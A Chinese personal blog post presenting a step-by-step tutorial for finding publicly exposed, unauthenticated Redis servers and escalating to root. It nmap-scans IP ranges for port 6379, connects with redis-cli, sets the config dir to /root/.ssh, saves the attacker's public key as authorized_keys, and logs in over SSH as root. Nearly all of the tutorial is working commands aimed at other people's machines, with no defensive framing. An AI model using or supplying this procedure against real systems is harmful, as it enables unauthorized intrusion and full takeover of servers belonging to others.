怕爹是孝顺,怕老婆是爱情 [登录·注册]

吕滔博客

首页 开发 运维 工具 摄影

扫描公开外网端口的redis(未授权远程登录)服务器并提权简要教程

工具 memory发布于February 5, 2017 标签: redis

步骤:
1、扫描端口查找有redis服务的服务器
2、连接查看是否需要授权
3、查看config dir
4、设置config dir
5、生成私钥和公钥
6、上传公钥到服务器
7、把公钥设置到服务器私钥认证文件
8、使用私钥登陆服务器

第一步:
扫描端口看看有哪些redis服务在公网上可以直接访问到,redis默认端口是6379,扫描工具是nmap

nmap -sT -p 6379 110.110.110.0/24 | grep --color -B5 open

上面命令是扫码110.110.110.0的整个ip端开放有6379端口的服务器。

第二步:
连接看看能否连接上redis

redis-cli -h 扫描出来的ip

测试是否需要密钥

keys *

第三步:
查看config dir路径,看看是不是/root/.ssh

config get dir

第四步:
把config dir路径设置成/root/.ssh

config set dir "/root/.ssh"

第五步:
本地生成公私钥

ssh-keygen -t rsa

第六步:
上传公钥到服务器

(echo -e "\n\n";cat 公钥文件名.pub;echo -e "\n\n";) > test.txt
cat test.txt | redis-cli -h 服务器地址 -x set test

第七步:
设置redis文件存储到/root/.ssh里面去,由于redis里面存在了我们的公钥所以我们可以实现免密码登陆

config set dbfilename "authorized_keys"
save

第八步:
登陆服务器

ssh -i 私钥文件名 root@服务器ip

相关推荐

添加新评论

网站状态

  • 栏目分类:35个
  • 发布文章:1097篇
  • 用户评论:604条

最新回复

  • 个人博客: 看看先
  • memory: 谢谢,已修正。
  • jrotty: 方法一中next后面少个'符号
  • daxia: mark
  • 企业孵化器: 厉害了
  • Bearox: 我也遇到了同样的问题,yum install dev86* 没用...
  • themebetter: 优化方法很不错。
  • 架构之路: 总结和nice,网站速度很快。
  • 架构之路: 总结的很好,简单、完整、高效。
  • memory: 我正在犹豫要不要更新了~~~ 因为1.2撇弃了php5.2,最低...
  • 灵九哲: medoo已经更新到v1.2了,博主更新下中文版网站内容
  • 灵九哲: medoo已经更新了v1.2,麻烦博主更新下中文版的网站,然后把...
  • memory: 用的typecho.
  • einsan: 涛哥,你的博客后端是自己开发的吗?还是使用哪一款开源产品?
  • yfly962464: 不行啊
  • memory: 哥们儿~非常不好意思,之前有段时间折腾jpress,后来就没有玩...
  • 夏日草博客: 记得很早的时候来过这个博客。
  • test1247: 好的,感谢。邮箱 121217605@qq.com
  • memory: 好的, 我回头找找呀。因为现在这个程序是php的,jpress的...
  • test1247: 这个jpress的主题能分享下吗